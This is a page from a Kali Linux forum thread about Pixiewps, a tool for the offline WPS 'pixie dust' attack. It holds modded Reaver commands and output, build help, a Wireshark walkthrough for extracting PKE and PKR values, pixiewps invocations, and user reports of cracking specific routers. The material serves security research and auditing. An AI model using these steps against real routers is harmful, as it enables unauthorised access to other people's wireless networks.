Page 1 of 5 12345 LastLast
Results 1 to 50 of 244

Thread: Pixiewps: wps pixie dust attack tool

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1

    Pixiewps: wps pixie dust attack tool

    We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368

    Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

    As opposed to the traditional online bruteforce attack, implemented in tools like Reaver or Bully which aim to recover the pin in a few hours, this method can get the pin in only a matter of milliseconds to minutes, depending on the target, if vulnerable.

    Recovering PIN:


    Recovering WPA-PSK (experimental):


    Brief description: Offline WPS bruteforce utility
    Repository: GitHub
    License: GNU GPLv3+
    Latest release: v1.3.x

    To work properly it requires a modified version of Reaver or Bully (neither versions are maintained by me):
    Modded Reaver mantained by rofl0r and included in Kali: GitHub (active development)
    Modded Bully by aanarchyy: GitHub (stale)

    A non-exhaustive list of vulnerable devices (not maintained by me): here

    Thread where it all started: WPS Pixie Dust Attack (Offline WPS Attack)

    References:
    1. Video presentation
    2. Slide presentation
    Last edited by wiire; 2017-11-09 at 19:30. Reason: Added PSA

  2. Only One Question. is this work with Broadcom Chipset Too or still it only works with ralink Chipset Only ??

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Ralink and some broadcom, not all

  4. Problem .....
    Modified Reaver Not Showing Publick Key (pke)..

    Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  5. #5
    @ FurqanHanif
    you can get it out M1,M2 messages in wireshark.
    there's also tshark.sh script that can grab it for you. I forgot where I got it, I think it was part of wpsoffline tool download.
    but make sure it's all part of one conversation (pin attempt). I just make the reaver to test one pin at a time and capture.

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.

  7. #7
    Join Date
    2015-Apr
    Posts
    1
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.
    please if u can reupload links for download...youtube link is deleted

  8. #8
    Join Date
    2016-Jan
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.
    i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.

  9. #9
    Quote Originally Posted by Necony286 View Post
    i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.
    A) Can't post youtube links in this forum.
    B) Can't PM in this forum.

  10. @soxrok2212 i already Mentioned that it's Modified Reaver.. and i also i downloaded it from You Tube Link. i Tried this on Five Routers but it don't giving me Same Output For All (No PKE ) ...
    @wn722 Which one is Pke exactly from This ??
    M1 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M2 wps.authenticator : 72da6b2102198192
    M3 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M3 wps.authenticator : 80c4d98ffd706201
    M3 wps.e_hash1 : 6e2cc52a5a22c84e19f701dc8153eb805fc0b247e06178ec3b 01b7b8202ab69a
    M3 wps.e_hash2 : 51f0f1b6c9b828345094b535a3c1e120bad0c94f03bc5790b9 de5ae40037224d
    M4 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M4 wps.authenticator : 8824706540ab0f4d
    M4 wps.encrypted_settings : 20bfe3939b2872273204fc93dd52d4ec25b68a23e596630712 b3404cdb1eb125fb3f4e96a8db05a754d5eeb98940728ea243 e8925b0d968fac70fc5bf71b8a36
    M4 wps.r_hash1 : b1eea2314f81f2e3d40afbe5af5c19b61bcb7f955d57f61630 6a696da347f0e5
    M4 wps.r_hash2 : eaf1b41b28edb43b6feeafdad792500a34482ec1b2b6ad8e97 4288230648e38c
    Last edited by FurqanHanif; 2015-04-03 at 13:42.

  11. #11
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Did you move reaver to bin after you compiled?

  12. #12
    Before trying the tool i really want to say to you " thank you so much wiire!"
    For all your great work and above all all your explanations all the way long (and for releasing a GPL v3 code)

    - to work on a modified version of Reaver/Bully
    We can see that it comes form the heart and that it must have been a "pain in th-censurde-ss" at some points.

    Thank you so much wiire!

  13. Quote Originally Posted by soxrok2212 View Post
    Did you move reaver to bin after you compiled?
    ./configure
    make
    make install


    i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin..

  14. #14
    Quote Originally Posted by FurqanHanif View Post
    ./configure
    make
    make install


    i think it overwrite the existing Reaver ( because existing reaver not showing the enrolle/E-HASH stuff but installing modified reaver showing enrolle/E-Hash stuff but not showing PKE).. :/ So i think their is no need to copy reaver in Bin..
    See if it compiles and creates the executable. Then try to run it from that folder (no make install).

    chmod +x configure
    ./configure
    make distclean && ./configure
    make
    ./reaver -i mon0 etc.

  15. #15
    Join Date
    2015-May
    Posts
    1
    Hi,

    I cannot install pixiewps, I get the following message:

    gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
    In file included from pixiewps.c:51:0:
    pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

    I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33 but I still have the same problem. I would really appreciate if anybody could help me... Thanks in advance.

  16. #16
    Join Date
    2015-May
    Posts
    1
    @KIMW

    pixiewps is now in kali official rep you can install it with "apt-get install pixiewps"

  17. #17
    Join Date
    2015-Jun
    Posts
    3
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

  18. #18
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    The wireless card probably does not support injection.

  19. #19
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    I have the same problem. Using a 2011 MBP with broadcom drivers.
    Any help would be appreciated.

    Thanks!

  20. #20
    Minor issue: It doesn't compile under Ubuntu's gcc 4.8.2 unless I edit the makefile as follows:
    $(CC) pixiewps.c $(CCFLAGS) -o $(TARGET)

  21. Same Output Getting...

  22. #22
    Join Date
    2015-Mar
    Posts
    2
    Can you go into some detail as there is a lot of censored information in the OP? Does this run similar to reaver? Does this automate the extraction of the required information from wireshark? Maybe a usage example would be helpful, as I did not see one.

    ie: pixiewps -b <bssid> or similar...

    Amazing work, nonetheless!

  23. #23
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    It's really not that hard to install. We told you exactly what to do. If you can't copy the executable reaver to bin, you shouldn't be using Linux.

  24. i Copy that Reaver file to bin Getting Same Output , Started reaver from That Compiled Directory still Getting Same Output , tried tshark it also not Showing Public key like thing. Now What ??

  25. #25
    It works perfectly.
    Just that I didn't updated my kali for a while and i tryed to install it without updating first and I got a fail.
    After updating i could compile and install pixiewps.c
    before updating i installed
    Code:
    libsqlite3-dev
    , I don't know if it was usefull.
    cheers & thanks

  26. #26
    Join Date
    2015-Apr
    Posts
    1
    hey just wanted to say thanks again for releasing this seems to work pretty good for me...one thing i noticed is on some routers the model# shows up as 123456 kinda curious as to why that is...also i just noticed the vid soxrok2212 put up last night has been taken down was that ya'll or youtube?

  27. #27
    Quick question, do you have to specify small dh in reaver to use the S flag in pixiewps?

  28. #28
    Quick answer
    I don't know if it is necessary but i did like this and it worked
    That's actually a question that i had in mind too

  29. #29
    Quote Originally Posted by kcdtv View Post
    Quick answer
    I don't know if it is necessary but i did like this and it worked
    That's actually a question that i had in mind too
    Hah! That was quick! I'll see if I can test this later on. Awesome work wiire, so far this seems to work great.

  30. #30
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Yes. Then you don't need to dig for the PKR in wireshark

  31. #31
    Join Date
    2013-Jul
    Posts
    844
    Since the help vid is down MTeams provides the following:

    This assumes you have a working reaver modded for pixie-dust
    This assumes you can run reaver and wash
    This will only show you how to quickly find the five(5) variables required.

    The modified reaver obtains three(3) of the five(5) variables. The only other problem is finding the corresponding or paired --pke and --pkr in wireshark.

    After you have put your wifi device in monitor mode.

    1. Start wireshark
    2. Select Capture
    3. Select Interface and choose your capture interfaces.
    4. Start the capture
    5. Click capture filters
    6. Type or/select wps.public_key[Enter]

    When you hit enter the wireshark screen may go blank as it filters the output.

    7. Start reaver
    8. As reaver obtains M1 and M2 data only these lines will appear in wireshark.
    9. When you have collected enough data stop reaver and wireshark.
    10. Copy your reaver output from the terminal window and save it to a text file. You will need it latter.

    The N1 Enrollee Nonce links the output in reaver to the correct M1 and M2 packets in wireshark.

    11. Go to wireshark, Click on the top screen showing No. Time Source......Info WPS M1

    The --pke is located in the WPS M1 packets.


    12 Select Ctrl-f. A drop down menu will appear = Wireshark Find Packet

    Select String

    Select Packet Details

    In the Filter Block type public key then select find


    13 Your cursor should now be over Public Key in the middle wireshark window and you should be in a WPS M1 packet(top screen info),

    14. Scroll up in the middle wireshark block and find the Enrollee Nonce Go to your reaver text file you saved and find the same N1 Enrollee Nonce. If it is followed by a:

    1. Authkey
    2. E-Hash1
    3. E-Hash2

    You can use this packet in wireshark.

    15 Scroll down in the same middle block in wireshark and find Public Key: hex string

    16 Click on the Pubic key, then right click, select copy, follow the > to the right, select value. The --pke value is now on the clipboard. Copy it to a text file.

    17 Go to wireshark, click on the top screen showing No. Time Source......Info WPS M2

    18 Again make sure the Enrollee Nonce is the same and copy the Public Key from the M2 packet. Do not confuse the Registrar Nonce with the Enrollee Nonce in the M2 packet. You now have the paired --pkr hex string.


    As long as the enrollee nonce is the same in both reaver output and wireshark M1 and M2 you have picked the right packets in wireshark.

    Put the five(5) variables in your pixie dust program and try your luck.

    Currently we type in leafpad the following at the bottom of our reaver output file we made in item 10 above and then just paste in the hex strings. When completed we paste the entire text string into a terminal window and type [Enter]

    pixiewps --e-nonce --pke --pkr --authkey --e-hash1 --e-hash 2

    After a few runs you can do this is less then three(3) minutes.,

  32. #32
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Video is back up in full HD just search "WPS Pixie Dust" on youtube and you'll find it.

  33. #33
    Join Date
    2015-Mar
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    Video is back up in full HD just search "WPS Pixie Dust" on youtube and you'll find it.
    Awesome work soxrok2212! I have been playing with this for some time now, unfortunately I only have BCM* based chipsets available for testing, and have had 0% success. Models range from D-Link DSL2 series, Netgear WDNR series, and Linksys E series. Very awesome work just the same though, and a whole new era for WPS auditing. Let me know if you would like any of the results I have capture for analysis.

    My command for all tests was:
    Code:
    #~: pixiewps -e <pke> -s <ehash-1> -z <ehash-2> -a <auth-key> -S -n <e-nonce>

  34. #34
    @mmusket33, FurqanHanif
    I don't know which version of the modded Reaver you are using. The description of the youtube video contains the latest (download). It prints all the info needed (see the '[P]' tag) apart PKR which can be gathered in the M2 message (under Public Key), or can be avoided if the -S option is specified in both Reaver and Pixiewps. This option is used only to "ease the burden of a 10 seconds copy and paste work".

    While I was still working on the program I made a tutorial on another forum to print some information not all (Authkey, E-Hash1, E-Hash2) with the ' > ' tag at the beginning of every print. So maybe you guys are using the 'old version'?


    Changing topic, Bongard tweeted my tool.

  35. #35
    Quote Originally Posted by wiire View Post
    Changing topic, Bongard tweeted my tool.
    Very nice !

    if the -S option is specified in both Reaver and Pixiewps
    That's answers the previous question of aanarchyy and that i was not so sure about

  36. in Wireshark Public key in Both M2 Message is
    000000000000000............
    . So is This Normal . Should i continue with This ?? Router Chipset is BroadCom..

  37. #37
    Quote Originally Posted by FurqanHanif View Post
    in Wireshark Public key in Both M2 Message is . So is This Normal . Should i continue with This ?? Router Chipset is BroadCom..
    You get PKR = 00:00 ... 00:02 when using the '-S' ('--dh-small') option on Reaver. You can use the same option on Pixiewps so you don't need to specify the PKR.

    @kcdtv
    Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.

  38. #38
    Join Date
    2015-Mar
    Location
    Morocco
    Posts
    8
    thank you for making this tool, it's not working on Technicolor APs i hope it will, because in my country (Morocco) 75% of the APs are Technicolor LoL!

  39. #39
    Join Date
    2013-Oct
    Posts
    15
    Nice work wiire and all involved !

    Will be sure to test this and gather some information on UK ISP based routers. I have a few lying around I can test

  40. #40
    @kcdtv
    Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.
    Sweet! I can confirm you that a friend had the same issue yesterday with ubuntu and that the modification solved the issue. In the name of canonial addicted (no one is perfect) thanks!
    as i was using reaver_mod and pixiewps.c i was wondering about this two options in the reaver mod and how to "play " with them "smartly" with pxiewps.
    Code:
    	-1, --p1-index                  Set initial array index for the first half of the pin [False]
    	-2, --p2-index                  Set initial array index for the second half of the pin [False]
    So if i understand well we could use them to try with pixiewps different seeds values then the one predefined for ralink and brodacom.
    Could you tel us know a bit more about this?
    Other thing that i was curious about. If i get in two different sessions the same nounce repeated, wouldn't it mean taht the entropy is very low also on this particular AP?
    cheers

  41. #41
    Quote Originally Posted by kcdtv View Post
    as i was using reaver_mod and pixiewps.c i was wondering about this two options in the reaver mod and how to "play " with them "smartly" with pxiewps.
    Code:
    	-1, --p1-index                  Set initial array index for the first half of the pin [False]
    	-2, --p2-index                  Set initial array index for the second half of the pin [False]
    So if i understand well we could use them to try with pixiewps different seeds values then the one predefined for ralink and brodacom.
    I don't undertand what you're trying to say here. Ralink doesn't have a seed. It doesn't use a pseudo-random number for ES-1 and ES-2. It uses a constant (ES-1 = ES-2 = 0).

    Broadcom has a pseudo-number generator. Its seed (for ES-1 and ES-2) can be bruteforced using the nonce as a reference: when using a certain number (initial seed) we get the same sequence of the nonce we know that we can find the ES-1 and ES-2 sequences because they're calculated right after the nonce.

    The PIN is provided by the Registrar (the attacker) on M4 and it's not relevant (for the pixie dust attack purposes). Quoting Bongard: the right PIN is provided by the Enrollee (AP) with M3 in two "Safes". The first one contains the first half of the PIN and it's lock combination is ES-1. The second one contains the second half of the PIN and it's lock combination is ES-2. The attack consists in bruteforcing the seed of the Broadcom's PRNG to get the two combinations (ES-1 and ES-2).

    Quote Originally Posted by kcdtv View Post
    Other thing that i was curious about. If i get in two different sessions the same nounce repeated, wouldn't it mean taht the entropy is very low also on this particular AP?
    If you look on page 55 on Bongard's slides.
    - "do not generate new random enrollee nonce in case of we have prebuild enrollee nonce"
    - "It should not generate new key pair if we have prebuild enrollee nonce"

    So on some implementations the nonce and the the keys don't change in different sessions. This is not about entropy, it's about vendor/manufacturer's implementations.

  42. #42
    Join Date
    2015-Mar
    Posts
    127
    This attack worked on Arris models TG1672 and DG1670.
    Modified reaver spits out info needed for pixiewps. wps pin in secs.

  43. #43
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    what is this, no stars for this topic yet? Geeeeeeeeez
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  44. #44
    Join Date
    2013-Oct
    Posts
    15
    Tested with UK Sky router Sagecom SR101 - WPS pin not found!

    I have a feeling this is a Broadcom chip, however I can't find any more information on this. If anyone does, information would be appreciated

    Off to find some more to test!

  45. #45
    @Calamita
    use the pcap file and run it through tshark.sh script = that'll extract the HW info.
    or go to fccid tool and use FCC ID number, it's usually on the sticker
    http://fccid.net/
    Last edited by wn722; 2015-04-06 at 02:49.

  46. #46
    Join Date
    2015-Mar
    Posts
    127
    Where can I find a link to tshark.sh?

  47. #47
    Join Date
    2013-Mar
    Posts
    2
    This worked so well for me...WOW. So WPS has been broken completely.

    I did a couple of captures, and noticed in WireShark that when you have a successful attempt, the relevant part of the M2 packet will be marked with light blue. I think that's what it was, anyway... I was thinking it signified a successful capture of what it needed, as it listed an ",,,R,F,C" on the good one, and only an ",,,F,C" on the fails.

    It took 0 seconds to crack, by the way. You're brilliant.

  48. #48
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    Hi all!
    Can u help me pls
    Where is the problem? Thanks!

    screenshot
    http://www36.zippyshare.com/v/WF6nh9cU/file.html

  49. #49
    Join Date
    2015-Mar
    Posts
    8
    Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done ?

  50. #50
    Quote Originally Posted by Desuu View Post
    Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done ?
    This attack could be potentially extended to more routers if more research is done. There are some other manufacturers that have not been checked yet (like Marvell, Intel, Qualcomm, Realtek...). Also, good entropy on embedded systems (with limited resources) is always a problem especially at boot.

    The devices that are not affected are probably the ones which use hardware random number generators. Also systems running Linux / Hostapd seem secure.

    I have nearly zero experience with this kind of stuff, so if you wanna jump in, do it. Anyone can contribute.

Similar Threads

  1. Data gathering for pixiewps (pixie dust attack)
    By wiire in forum Project Archive
    Replies: 16
    Last Post: 2018-07-24, 01:42
  2. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  3. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •